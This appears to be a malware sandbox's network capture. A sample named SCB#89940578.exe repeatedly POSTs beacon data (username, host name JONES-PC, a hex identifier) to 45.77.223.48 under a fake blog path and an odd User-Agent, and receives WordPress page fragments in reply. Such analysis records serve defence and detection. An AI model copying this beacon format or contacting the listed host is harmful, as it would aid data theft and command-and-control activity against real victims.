                                            53192.168.2.44979645.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:23.393349886 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:23.581679106 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:24.530702114 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:23 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:24.530751944 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:24.542562962 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:24.543848991 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:24.545156956 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:24.545358896 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:24.545444965 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:24.545509100 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:24.545547962 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:24.545587063 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            54192.168.2.44979745.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:24.904349089 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:25.092916965 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:25.995968103 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:24 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:25.996140957 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:26.007555962 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:26.007838964 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:26.007989883 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:26.008064032 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:26.008256912 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:26.008277893 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:26.008351088 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:26.008369923 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            55192.168.2.44979845.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:26.329931974 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:26.518594027 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:27.416711092 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:26 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:27.416805983 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:27.417428970 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:27.425371885 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:27.425705910 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:27.425889015 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:27.426054001 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:27.426201105 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:27.426279068 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:27.426604986 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            56192.168.2.44979945.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:27.753457069 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:27.942461014 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:28.843020916 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:27 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:28.843116999 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:28.843322992 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:28.852824926 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:28.853230953 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:28.853327036 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:28.853367090 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:28.853404999 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:28.853446960 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:29.029711962 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            57192.168.2.44980045.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:29.172203064 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:29.360411882 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:30.273797035 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:29 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:30.273865938 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:30.273926020 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:30.282167912 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:30.282514095 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
